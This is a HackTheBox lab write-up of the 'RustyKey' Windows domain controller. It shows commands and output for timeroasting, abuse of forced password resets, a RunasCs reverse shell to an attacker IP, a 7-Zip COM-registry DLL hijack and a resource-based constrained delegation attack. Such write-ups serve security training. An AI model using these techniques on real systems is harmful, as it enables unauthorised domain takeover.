TheLeopard65
Published on

HackTheBox - Hard - Windows - RustyKey

AUTHORS
  • avatar
    NAME
    Yasir Mehmood
    TWITTER
HackTheBox RustyKey Machine - Banner

RustKey is yet another assumed breach scenario wherein NTLM authentication is disabled but an older version of Kerberos is being utilized. Gathering bloodhound data we identify several targets, the first one being it-computer3 which we can access through timeroasting. It-computer3 is a member of the helpdesk group which can add and remove members from the protected objects group and change passwords for several accounts. We can remove the IT and support groups and gain access to 2 additional accounts: BB.MORGAN, who is the user, and EE.REED. We find a memo detailing additional access provided to members of the support team, including EE.REED, on archiving utilities. We utilize this as a hint to look at registry DLL paths for 7-zip which we can modify to point to an arbitrary DLL. When we point this to our malicious DLL we gain access as MM.TURNER who we can use to conduct an RBCD attack.

Machine NameIP-AddressDificultyMachine DomainSecond Domain
RustyKey10.10.11.75Hardrustykey.htbdc.rustykey.htb

Enumeration

  • The tester performed an initial Nmap Scan and got the following results:
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ sudo nmap -sC -sV 10.10.11.75
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-28 21:02 CEST
Nmap scan report for 10.10.11.75
Host is up (0.029s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-29 03:02:34Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: rustykey.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2025-06-29T03:02:38
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
|_clock-skew: 7h59m59s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.01 seconds
  • The tester then added the IP-Address to the /etc/hosts file on the attacker system.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ echo "10.10.11.75 DC rustykey.htb" | sudo tee -a /etc/hosts
10.10.11.75 DC rustykey.htb
  • This Machine was an assumed breach scenario as it usually is with the Windows Machines.
HackTheBox RustyKey Machine - Initial Breach Information
  • When attempting to authenticate to ldap, the tester received a STATUS NOT SUPPORTED error.
  • Which indicates that the default authentication method of NTLM, is disabled.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ netexec smb rustykey.htb -u rr.parker -p '8#t5HE8L!W3A'
SMB         10.10.11.75   445    10.10.11.75    [*]  x64 (name:10.10.11.75) (domain:RUSTYKEY.HTB) (signing:True) (SMBv1:False) (NTLM:False)
SMB         10.10.11.75   445    10.10.11.75    [-]  rustykey.htb\rr.parker:8#t5HE8L!W3A STATUS_NOT_SUPPORTED
  • The tester then dicided to setup and use the kerberos authentication Method.
  • Firstly, the tester generated a krb5.conf file using the guide written by 0xBEN .
  • Afterwards, the tester exported the file to be the main configuration file and initiate an authentication.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ export KRB5_CONFIG=/home/kali/HTB/RustKey/custom_krb5.conf
kinit rr.parker
Password for rr.parker@RUSTYKEY.HTB:
Warning: encryption type arcfour-hmac used for authentication is deprecated and will be disabled
  • The tester then performed a double check on the kerberos authentication by running klist.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ klist
Ticket cache: FILE:/tmp/krb5cc_1000
Default principal: rr.parker@RUSTYKEY.HTB

Valid starting       Expires              Service principal
06/29/2025 09:18:42  06/29/2025 19:18:42  krbtgt/RUSTYKEY.HTB@RUSTYKEY.HTB
        renew until 06/30/2025 09:18:38
  • The tester then exported the KRB5CCNAME variable to have the value of the TGT ticket.
  • That we got through this process which we can find in the /tmp directory.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ export KRB5CCNAME=/tmp/krb5cc_1000
  • This step is actually unnecessary as kinit should set the environment variable by default.
  • But tester, messing around with a bunch of TGTs. had to export this environment variable.
  • Then, tester authenticates to ldap using kerberos and the exported kcache, and it was successful.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ netexec ldap rustykey.htb -k --use-kcache
LDAP        rustykey.htb    389    DC               [*] None (name:DC) (domain:rustykey.htb)
LDAP        rustykey.htb    389    DC               [+] rustykey.htb\rr.parker from ccache
  • The tester then used the netexec to grab some data for the bloodhound tool's Enumeration.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ netexec ldap rustykey.htb -k --use-kcache --dns-server 10.10.11.75 --bloodhound -c all
LDAP        rustykey.htb    389    DC               [*] None (name:DC) (domain:rustykey.htb)
.... < SNIPPING LONG OUTOUT STREAM > ....
LDAP        rustykey.htb    389    DC               Compressing output into /home/kali/.nxc/logs/DC_rustykey.htb_2025-06-29_145025_bloodhound.zip
  • Looking at the bloodhound data, the tester couldn't find any direct ACLs that were exploitable.
  • It looked like the main goal was to get access as NN.MARCOS user, who was a member of the Helpdesk group.
  • The Helpdesk Group had permissions to Force Change Password several users.
  • Some of the users in question were members of the Remote Management Users and the Protected Objects group.
HackTheBox RustyKey Machine - Permissions of the Help Group
  • The tesrer then started performing enumeration on the Helpdesk group question.
  • It was found that it-computer3 acount had addSelf permission over the Helpdesk group.
HackTheBox RustyKey Machine - Permissions of IT-Computer3 Account

Initial Access

  • Since it's not a pre-2000-compatible-windows group member, the only other option available to check on this computer account is to do some form of roasting.
  • One particular method stands out for computer accouts which is timeroasting. The tester decided to use use timeroast.py to conduct this attack.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ sudo ./timeroast.py 10.10.11.75 | tee ntp-hashes.txt
[sudo] password for kali:
1000:$sntp-ms$673deff65ba0b936f611053f3bead102$1c0111e900000000000a1b344c4f434cec0b2af884ffce81e1b8428bffbfcd0aec0b4ed624ffbc0dec0b4ed624ffd892
1104:$sntp-ms$da9a7a30f696e17bb4b4731865fb1b43$1c0111e900000000000a1b344c4f434cec0b2af8829b7d9fe1b8428bffbfcd0aec0b4ed6d2bc3321ec0b4ed6d2bc4a9e
1103:$sntp-ms$c54e367acabfdf8ae049616c06516c60$1c0111e900000000000a1b344c4f434cec0b2af8829b0178e1b8428bffbfcd0aec0b4ed6d2bbb044ec0b4ed6d2bbd1d2
1105:$sntp-ms$13b40597252d73a45e01cb98399496b0$1c0111e900000000000a1b344c4f434cec0b2af8829bba05e1b8428bffbfcd0aec0b4ed6d6935836ec0b4ed6d693a3b6
1106:$sntp-ms$0eeaa19ae46e8b15a32cd631b73bcce6$1c0111e900000000000a1b344c4f434cec0b2af8843916a2e1b8428bffbfcd0aec0b4ed6d830b82eec0b4ed6d830f99d
1107:$sntp-ms$5039dbb0876228e38dc2f241064e3fe3$1c0111e900000000000a1b344c4f434cec0b2af885bed817e1b8428bffbfcd0aec0b4ed6d9b677f6ec0b4ed6d9b6c01b
1121:$sntp-ms$e4e780762ee1e408b365049937c9e035$1c0111e900000000000a1b354c4f434cec0b2af884acc921e1b8428bffbfcd0aec0b4ed6ec9c4545ec0b4ed6ec9c779a
1120:$sntp-ms$7a0907455dad90ca9538a7f175d94dca$1c0111e900000000000a1b354c4f434cec0b2af884a9ebf7e1b8428bffbfcd0aec0b4ed6ec9973d9ec0b4ed6ec999715
1118:$sntp-ms$a27dee3aad3c978ed6c52a603026e7fd$1c0111e900000000000a1b354c4f434cec0b2af8848f6639e1b8428bffbfcd0aec0b4ed6ec7ef680ec0b4ed6ec7f0c4f
1119:$sntp-ms$855ad8d96730a4e5fa6b3492378e52b4$1c0111e900000000000a1b354c4f434cec0b2af884924a19e1b8428bffbfcd0aec0b4ed6ec81c999ec0b4ed6ec81f538
1122:$sntp-ms$ff95d282096729712b1275fbb39a814d$1c0111e900000000000a1b354c4f434cec0b2af883f81f60e1b8428bffbfcd0aec0b4ed6f0001e32ec0b4ed6f0006804
1123:$sntp-ms$fd93afeae388bba24361afbd791d6dcd$1c0111e900000000000a1b354c4f434cec0b2af883f92a22e1b8428bffbfcd0aec0b4ed6f0013d16ec0b4ed6f0016dbe
1125:$sntp-ms$c1a103e9a3cc75e7a525ee1f07663272$1c0111e900000000000a1b354c4f434cec0b2af883099905e1b8428bffbfcd0aec0b4ed6f32a411cec0b4ed6f32a6e68
1124:$sntp-ms$f470bb24f1a392e4a54b937dc3e71b07$1c0111e900000000000a1b354c4f434cec0b2af88308a5c0e1b8428bffbfcd0aec0b4ed6f3294573ec0b4ed6f3297cd1
1127:$sntp-ms$888e560b0110dcdd8f8c7875d2ac570a$1c0111e900000000000a1b354c4f434cec0b2af8827235a7e1b8428bffbfcd0aec0b4ed6f669e9a8ec0b4ed6f66a16f5
1126:$sntp-ms$a561e867a6d41b1f24759f7e3488f568$1c0111e900000000000a1b354c4f434cec0b2af88271913ce1b8428bffbfcd0aec0b4ed6f6692c13ec0b4ed6f6697c9b
.... < SNIPPING LONG OUTOUT STREAM > ....
  • The tester was able to pin point the relevent hash because of the rid-brute attack conducted earlier.
  • The hash of most-relevance was 1125 as it was the RID of IT-COMPUTER3.
  • The tester then used the bundled tool timecrack found in the same repository, to crack the hashes.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ sudo ./timecrack.py ../ntp_hashes.txt rockyou_clean.txt
[+] Cracked RID 1125 password: [REDACTED]
  • The tester was successfully able to recover the credentials for it-computer3$ account.
  • The next step, was to add our controlled computer account to the Helpdesk group.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -u rr.parker -k add groupMember Helpdesk it-computer3$
[+] it-computer3$ added to Helpdesk
  • After successfully adding the it-computer3$ user to the Helpdesk group.
  • The tester used getTGT script from impacket to get its TGT Ticket.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ impacket-getTGT  'RUSTYKEY.HTB/it-computer3$'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

Password:
[*] Saving ticket in it-computer3$.ccache

Lateral Movement #1

  • After enumeration of the Protected Objects, the tester saw that most of the users were in that group.
  • Which meant that even after reseting their passwords, authentication would not be successfull.
  • This is because to authenticate as a user that is a member of Protected Objects, their TGT Ticket is required.
  • However in this case, the teseter was able to AddMembers to the Protected Objects.
  • This exploitability isn't too useful on its own, but this permissions also allows you to remove members.
  • The tester decided to remove the IT group from the Protected Objects using the BloodyAD tool.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -u rr.parker -k remove groupMember "Protected Objects" IT
[-] IT removed from Protected Objects
  • Removing the IT group from Protected Groups allowed the tester to reset the password for bb.morgan user.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -u rr.parker -k set password bb.morgan Wild1234!
[+] Password changed successfully!
  • After which, the tester was able to authenticate as bb.morgan user through kinit utility.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ echo '8#t5HE8L!W3A' | kinit rr.parker
Password for bb.morgan@RUSTYKEY.HTB:
Warning: encryption type arcfour-hmac used for authentication is deprecated and will be disabled
  • Since bb.morgan user was a member of Remote Management Users Group, it allowed the tester to get a WinRM shell.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ evil-winrm -i dc.rustykey.htb -r rustykey.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\bb.morgan\Documents> dir ../Desktop

    Directory: C:\Users\bb.morgan\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         6/4/2025   9:15 AM           1976 internal.pdf
-ar---        7/10/2025   7:02 PM             34 user.txt
  • The tester was able to gain access as the bb.morgan user and also found a PDF on Desktop.

Lateral Movement #2

  • Transferring over the pdf file to attacker system, The tester was able to read the following email.
Internal Memo

From: bb.morgan@rustykey.htb
To: support-team@rustykey.htb
Subject: Support Group - Archiving Tool Access
Date: Mon, 10 Mar 2025 14:35:18 +0100

Hey team,
	As part of the new Support utilities rollout, extended access has been temporarily granted to allow testing and
troubleshooting of file archiving features across shared workstations. This is mainly to help streamline ticket
resolution related to extraction/compression issues reported by the Finance and IT teams. Some newer systems handle
context menu actions differently, so registry-level adjustments are expected during this phase.

A few notes:
- Please avoid making unrelated changes to system components while this access is active.
- This permission change is logged and will be rolled back once the archiving utility is confirmed stable in all
environments.
- Let DevOps know if you encounter access errors or missing shell actions.

Thanks,
BB Morgan
IT Department
  • It Looked like a memo to inform that support team members, including ee.reed, had access to archiving tools.
  • The memo also mentioned that there could be registry level adjustments during this phase as well.
  • Which indicated that support might have access to modify the registry related to the archiving tools.
  • Therefore, the current target is ee.reed, the tester first removed Support group from Protected Objects.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -u rr.parker -k remove groupMember "Protected Objects" SUPPORT
[-] SUPPORT removed from Protected Objects
  • Tester was then able to change password for ee.reed user, since his group is no longer part of the Protect Objects.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ bloodyAD --host dc.rustykey.htb --dc-ip 10.10.11.75 -d rustykey.htb -u rr.parker -k set password ee.reed 'Wild1234!'
[+] Password changed successfully!
  • However, the tester was still unable to authenticate using WinRM,ldap, or SMB based authentication Methods.
  • So instead, the tester used the RunasCS tool. Created by @antonioCoco 
*Evil-WinRM* PS C:\Windows\Temp> ./RunasCs.exe ee.reed Wild1234! cmd.exe -r 10.10.16.75:3232
[*] Warning: User profile directory for user ee.reed does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The logon for user 'ee.reed' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-46cab11$\Default
[+] Async process 'C:\Windows\system32\cmd.exe' with pid 3264 created in background.
  • The tester was successfully able to receive the reverse shell on the netcat listener.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ rlwrap nc -lvnp 3232
listening on [any] 3232 ...
connect to [10.10.16.75] from (UNKNOWN) [10.10.11.75] 61519
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

PS C:\Users> whoami
rustykey\ee.reed

Privilege Escalation

  • Having found that the members of support group (such as ee.reed) have privileges of the Registry.
  • The tester decided to enumerate and perform privilege escalation via the Registry Hives.
  • The tester then used following script to check for writeable DLL paths in the Registry.
PS C:\Windows\system32> Get-ChildItem HKLM:\SOFTWARE -Recurse -ErrorAction SilentlyContinue | Where-Object {
>>     try {
>>         $keyPath = $_.Name.Replace('HKEY_LOCAL_MACHINE\', '')
>>         $regKey = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey($keyPath, $true)
>>         $regKey.SetValue('TestWrite','1')
>>         $regKey.DeleteValue('TestWrite')
>>         $true
>>     } catch {
>>         $false
>>     }
>> }

    Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID

Name                                          Property
----                                          --------
{23170F69-40C1-278A-1000-000100020000}        (default) : 7-Zip Shell Extension

    Hive: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}

Name                           Property
----                           --------
InprocServer32                 (default)      : C:\Program Files\7-Zip\7-zip.dll
							   ThreadingModel : Apartment
  • The tester was then able to alter the (default) value InprocServer32 key in the below hive.
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}
  • The tester then used this misconfiguration/vulnerability to change this into a malicious dll.
PS C:\Windows\Tasks> Set-ItemProperty -Path "HKLM:\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32" -Name "(default)" -Value "C:\Windows\Tasks\w.dll"
PS C:\Windows\Tasks> Get-ItemProperty -Path "HKLM:\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32"

(default)      : C:\Windows\Tasks\w.dll
ThreadingModel : Apartment
PSPath         : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32
PSParentPath   : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}
PSChildName    : InprocServer32
PSDrive        : HKLM
PSProvider     : Microsoft.PowerShell.Core\Registry
  • After making the required changes, the tester had to wait for about a minute to receive a reverse shell Connection.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ rlwrap nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.16.75] from (UNKNOWN) [10.10.11.75] 61519
Microsoft Windows [Version 10.0.17763.7434]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows>whoami
whoami
rustykey\mm.turner
  • The tester then discoverd through bloodhound that the mm.turner user is a member of Delegationmanagers Group.
  • Which means this user can act on the behalf of the Domain Controller (DC).
  • Firstly, the tester granted the DC$ account, the permission to delegate authentication to IT-Computer3$ account.
PS C:\Windows> Set-ADComputer DC$ -PrincipalsAllowedToDelegateToAccount 'it-computer3$'
PS C:\Windows> Get-ADComputer DC$ -Properties PrincipalsAllowedToDelegateToAccount

DistinguishedName                    : CN=DC,OU=Domain Controllers,DC=rustykey,DC=htb
DNSHostName                          : dc.rustykey.htb
Enabled                              : True
Name                                 : DC
ObjectClass                          : computer
ObjectGUID                           : dee94947-219e-4b13-9d41-543a4085431c
PrincipalsAllowedToDelegateToAccount : {CN=IT-Computer3,OU=Computers,OU=IT,DC=rustykey,DC=htb}
SamAccountName                       : DC$
SID                                  : S-1-5-21-3316070415-896458127-4139322052-1000
UserPrincipalName                    :
  • The next step of RBCD is to obtain a Service Ticket and the tester did just that.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ impacket-getST -spn "CIFS/dc.rustykey.htb" -impersonate backupadmin -dc-ip 10.10.11.75 "rustykey.htb/rr.parker:'8#t5HE8L!W3A'"
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating backupadmin
/home/kali/.local/bin/getST.py:380: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/home/kali/.local/bin/getST.py:477: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2self
/home/kali/.local/bin/getST.py:607: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow()
/home/kali/.local/bin/getST.py:659: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Use timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)
[*] Requesting S4U2Proxy
[*] Saving ticket in backupadmin@CIFS_DC.rustykey.htb@RUSTYKEY.HTB.ccache
  • After getting the ccache file, the tester then performed a check for authentication.
┌──(kali@kali)-[~/HTB/RustyKey]
└─$ export KRB5CCNAME=$(pwd)/backupadmin@CIFS_DC.rustykey.htb@RUSTYKEY.HTB.ccache

┌──(kali@kali)-[~/HTB/RustyKey]
└─$ nxc smb dc.rustykey.htb -k -u backupadmin --use-kcache -X "dir C:\Users\Administrator\Desktop"
SMB         DC.rustykey.htb 445    DC               [*]  x64 (name:DC) (domain:rustykey.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         DC.rustykey.htb 445    DC               [+] rustykey.htb\backupadmin from ccache (Pwn3d!)
SMB         DC.rustykey.htb 445    DC               [+] Executed command via wmiexec
SMB         DC.rustykey.htb 445    DC                   Directory: C:\Users\Administrator\Desktop
SMB         DC.rustykey.htb 445    DC               Mode                LastWriteTime         Length Name
SMB         DC.rustykey.htb 445    DC               ----                -------------         ------ ----
SMB         DC.rustykey.htb 445    DC               -ar---        7/10/2025   7:02 PM             34 root.txt
.... < SNIPPING LONG OUTOUT STREAM > ....
  • As it can seen in the above output that the tester was able to execute commands as the DC$.
  • Which meant that the Rustykey Machine on HackTheBox was now complete.
HackTheBox RustyKey Machine - Machine Completed
VIEW THE BLOG POST ON GITHUB